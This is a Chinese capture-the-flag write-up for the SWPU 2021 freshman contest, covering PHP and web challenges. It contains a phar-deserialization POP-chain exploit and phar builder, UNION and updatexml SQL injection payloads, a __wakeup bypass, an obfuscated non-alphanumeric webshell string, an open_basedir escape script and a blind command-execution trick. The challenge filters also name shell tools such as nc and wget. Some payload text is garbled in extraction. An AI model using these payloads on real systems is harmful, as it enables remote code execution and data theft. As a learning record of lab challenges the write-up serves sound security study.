目录

SWPU-2021-新生赛

SWPU 2021 新生赛

babyunser

phar反序列化

利用文件查看器直接读到三个文件 read.php php include(‘class.php’); $a=new aa(); ? error_reporting(0); $filename=$_POST[‘file’]; if(!isset($filename)){ die(); } $file=new zz($filename); $contents=$file->getFile(); ?>

“.$contents;?> class.php php class aa{ public $name; public function __construct(){ $this-name=‘aa’; } public function __destruct(){ $this->name=strtolower($this->name); } } class ff{ private $content; public $func; public function __construct(){ $this->content="\php @eval($_POST[1]);?”; } public function __get($key){ $this->$key->{$this->func}($_POST[‘cmd’]); } } class zz{ public $filename; public $content=‘surprise’; public function __construct($filename){ $this->filename=$filename; } public function filter(){ if(preg_match(’/^/|php:|data|zip|//i’,$this->filename)){ die(‘这不合理’); } } public function write($var){ $filename=$this->filename; $lt=$this->filename->$var; //此功能废弃,不想写了 } public function getFile(){ $this->filter(); $contents=file_get_contents($this->filename); if(!empty($contents)){ return $contents; }else{ die(“404 not found”); } } public function __toString(){ $this->{$_POST[‘method’]}($_POST[‘var’]); return $this->content; } } class xx{ public $name; public $arg; public function __construct(){ $this->name=‘eval’; $this->arg=‘phpinfo();’; } public function __call($name,$arg){ $name($arg[0]); } } upload,php php if(isset($_POST[‘submit’])){ $upload_path=“upload/".md5(time()).".txt”; $temp_file = $_FILES[‘upload_file’][’tmp_name’]; if (move_uploaded_file($temp_file, $upload_path)) { echo “文件路径:”.$upload_path; } else { $msg = ‘上传失败’; } } 因为上传的文件会直接被改名且成为txt文件,所以不考虑文件上传绕过rce pop链条 {aa __strlower} – {zz __toString method=wreite,filename->$var} –> {ff __get,$key=$content=xx ,func=assert,} –> {xx __call, $name=assert,$arg=$_POST} 其中 (解析 phar:// 伪协议时,会将其内容进行反序列化,所以 phar 里面的内容传入恶意 pop 链) file=phar://…&method=write&var=content&cmd=system(‘cat /flag’); exp php class aa{ public $name; function __construct(){ $this-name = new zz(); } } class zz{ public $filename; public $content=‘surprise’; function __construct(){ $this->filename = new ff(); } } class ff{ private $content; public $func = “assert”; function __construct(){ $this->content = new xx(); } } class xx{ public 
$name; public $arg; } $a = new aa(); echo urlencode(serialize($a));

下面这部分就没改

$phar = new Phar(“phar.phar”); $phar->startBuffering(); $phar->setStub(“php __HALT_COMPILER(); ?”); //设置stub $phar->setMetadata($a); //将自定义的meta-data存入manifest $phar->addFromString(“test.txt”, “test”); //添加要压缩的文件 //签名自动计算 ==> POST read.php file=phar://upload/f17682891b083ec486fe811956039270.txt&method=write&var=content&cmd=system(‘cat /flag’);

easy_md5

数组绕过

if ($name != $password && md5($name) == md5($password)){ echo $flag; } 数组绕过 name[]=1 password[]=2

easy_sql

/?wllm=-1’ union select 1,2,3–+ /?wllm=-1’ union select 1,2,database()–+ /?wllm=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())–+ /?wllm=-1’ union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=‘test_tb’)–+ /?wllm=-1’ union select 1,2,(select group_concat(flag)from test_tb)–+

no_wakeup

wake up 绕过 class HaHaHa{ public $admin; public $passwd; public function __construct(){ $this->admin =“user”; $this->passwd = “123456”; } public function __wakeup(){ $this->passwd = sha1($this->passwd); } public function __destruct(){ if($this->admin === “admin” && $this->passwd === “wllm”){ include(“flag.php”); echo $flag; }else{ echo $this->passwd; echo “No wake up”; } } } $Letmeseesee = $_GET[‘p’]; unserialize($Letmeseesee); O:6:“HaHaHa”:2:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;} Change to O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}

error

报错注入 ?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+ ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)–+ ?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘test_tb’ limit 1,1),0x7e),1)–+ 这里涉及到flag显示一半的问题 ?id=1’ and updatexml(1,concat(0x7e,(select flag from test_tb),0x7e),1)–+ ?id=1’ and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)–+

hardrce

取反绕过 rce

if(isset($_GET[‘wllm’])) { $wllm = $_GET[‘wllm’]; $blacklist = [’ ‘,’\t’,’\r’,’\n’,’+’,’[’,’^’,’]’,’"’,’-’,’$’,’’,’?’,’<’,’>’,’=’,’`’,]; foreach ($blacklist as $blackitem) { if (preg_match(’/’ . $blackitem . ‘/m’, $wllm)) { die(“LTLT说不能用这些奇奇怪怪的符号哦!”); }} if(preg_match(’/[a-zA-Z]/is’,$wllm)) { die(“Ra’s Al Ghul说不能用字母哦!”); } echo “NoVic4说:不错哦小伙子,可你能拿到flag吗?”; eval($wllm); } php fwrite(STDOUT,’[+]your function: ‘); $system=str_replace(array("\r\n", “\r”, “\n”), “”, fgets(STDIN)); fwrite(STDOUT,’[+]your command: ‘); $command=str_replace(array("\r\n", “\r”, “\n”), “”, fgets(STDIN)); echo ‘[] (’.urlencode($system).’)(’.urlencode($command).’);’;

hardrce_3

[参考](https://www.cnblogs.com/pursue-security/p/15404150.html)

自增绕过 rce

if(isset($GET[‘wllm’])) { $wllm = $GET[‘wllm’]; $blacklist = [’ ‘,’^’,’~’,’|’]; foreach ($blacklist as $blackitem) { if (preg_match(’/’ . $blackitem . ‘/m’, $wllm)) { die(“小伙子只会异或和取反?不好意思哦LTLT说不能用!!”); }} if(preg_match(’/[a-zA-Z0-9]/is’,$wllm)) { die(“Ra’sAlGhul说用字母数字是没有灵魂的!”); } echo “NoVic4说:不错哦小伙子,可你能拿到flag吗?”; eval($wllm); } //测试发现7.0.12以上版本不可使用 //使用时需要url编码下 $=[];$=@"$";$=$[’!’==’@’];$=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$.=$;$=$_;$++;$++;$++;$++;$.=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=’’;$__=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$__++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$__++;$.=$__;$=$$;$($[_]); 固定格式 构造出来的 assert($POST[]); 然后post传入 _=phpinfo(); 禁用了很多函数,但可以使用 file_put_contents _=file_put_contents(‘1.php’," “); 这段代码的目的是尝试绕过服务器的 open_basedir 限制,以读取服务器上的某些文件(如 /flag)。open_basedir 是 PHP 的一个安全设置,用于限制脚本只能访问指定目录内的文件。通过修改 open_basedir 的值并切换目录,代码试图突破这一限制。 php // 获取 open_basedir 的当前值,并输出 print_r(ini_get(‘open_basedir’).’<br’); // 创建一个名为 ’test’ 的目录 mkdir(’test’); // 切换到 ’test’ 目录 chdir(’test’); // 将 open_basedir 设置为 ‘..’,即上一级目录 ini_set(‘open_basedir’,’..’); // 返回上一级目录 chdir(’..’); // 再次返回上一级目录 chdir(’..’); // 再次返回上一级目录 chdir(’..’); // 将 open_basedir 设置为 ‘/’ ini_set(‘open_basedir’,’/’); // 读取并输出 ‘/flag’ 文件的内容 echo file_get_contents(’/flag’); // 输出数字 1 print(1); ?>

no echo rce

无回显 rce

if(isset($_GET[‘url’])) { $url=$_GET[‘url’]; if(preg_match(’/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|-|*|"|>|<|%|$/i’,$url)) { echo “Sorry,you can’t use this.”; } else { echo “Can you see anything?”; exec($url); } /?url=tac /flllll\aaaaaaggggggg | tee 2.txt 然后访问 2.txt 即可 这种当然可以尝试反弹 shell

sql

sql fuzz,简单绕过,数据截取

/?wllm=-1’//union//select//1,2,database()%23 /?wllm=-1’//union//select//1,2,group_concat(table_name)//from//information_schema.tables//where//table_schema//like//database()%23 /?wllm=-1’//union//select//1,2,group_concat(flag)//from//LTLT_flag%23 /?wllm=-1’//union//select//1,2,mid(group_concat(flag),20,40)//from//LTLT_flag%23